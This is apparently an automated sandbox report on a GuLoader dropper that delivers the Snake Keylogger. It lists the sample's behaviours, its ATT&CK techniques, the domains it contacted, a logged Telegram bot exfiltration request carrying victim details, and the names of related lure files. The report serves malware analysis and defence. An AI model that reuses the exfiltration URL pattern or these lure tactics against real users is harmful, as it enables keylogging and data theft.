Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe

Code function: 0_2_004061A5 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_004061A5

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000009.00000002.2578808051.0000000025A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000009.00000002.2578808051.0000000025A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	311 Process Injection	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
RmIYOfX0yO.exe	74%	Virustotal		Browse
RmIYOfX0yO.exe	65%	ReversingLabs	Win32.Trojan.GuLoader

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\magmaet\clenched\RmIYOfX0yO.exe	65%	ReversingLabs	Win32.Trojan.GuLoader

Source	Detection	Scanner	Label	Link
http://www.microsoft.cod	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.186.78	true	false	high
drive.usercontent.google.com	142.250.186.33	true	false	high
reallyfreegeoip.org	104.21.80.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2002:20:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 00000002.00000002.2178315725.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2188167978.0000000008022000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	msiexec.exe, 00000009.00000002.2564635002.0000000009D48000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	msiexec.exe, 00000009.00000002.2578808051.0000000025B29000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B38000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C02000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B7B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	RmIYOfX0yO.exe, 00000000.00000000.1293647794.000000000040A000.00000008.00000001.01000000.00000003.sdmp, RmIYOfX0yO.exe, 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	msiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B7B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	msiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B50000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	msiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B38000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B7B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lBlq	powershell.exe, 00000002.00000002.2178786128.00000000048B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	msiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B38000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2178786128.00000000048B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.cod	powershell.exe, 00000002.00000002.2178315725.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000009.00000002.2578808051.0000000025B38000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.78	drive.google.com	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
142.250.186.33	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
104.21.80.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587700
Start date and time:	2025-01-10 17:06:29 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RmIYOfX0yO.exe renamed because original name is a hash value
Original Sample Name:	f5f3c3a8c7f9f5fb9531fa0d57012ce0869b52b23d05e6c9b7a0220ac917db6d.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/16@5/5
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 96% Number of executed functions: 155 Number of non-executed functions: 55
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 1480 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7472 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
11:07:27	API Interceptor	39x Sleep call for process: powershell.exe modified
11:09:15	API Interceptor	123x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse
	https://marcuso-wq.github.io/home/	Get hash	malicious	HTMLPhisher	Browse
	https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	Get hash	malicious	HTMLPhisher	Browse
	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
158.101.44.242	2V7usxd7Vc.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	tx4pkcHL9o.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PO#3_RKG367.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	FORTUNE RICH_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PO#5_Tower_049.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	file.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	MtxN2qEWpW.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	b5JCISnBV1.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	ql8KpEHT7y.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	8kDIr4ZdNj.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	2V7usxd7Vc.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	tx4pkcHL9o.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	New Order-090125.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	4iDzhJBJVv.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
reallyfreegeoip.org	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	MtxN2qEWpW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	b5JCISnBV1.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	ql8KpEHT7y.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	8kDIr4ZdNj.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	2V7usxd7Vc.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	tx4pkcHL9o.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	New Order-090125.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.64.1
	4iDzhJBJVv.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
api.telegram.org	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://marcuso-wq.github.io/home/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
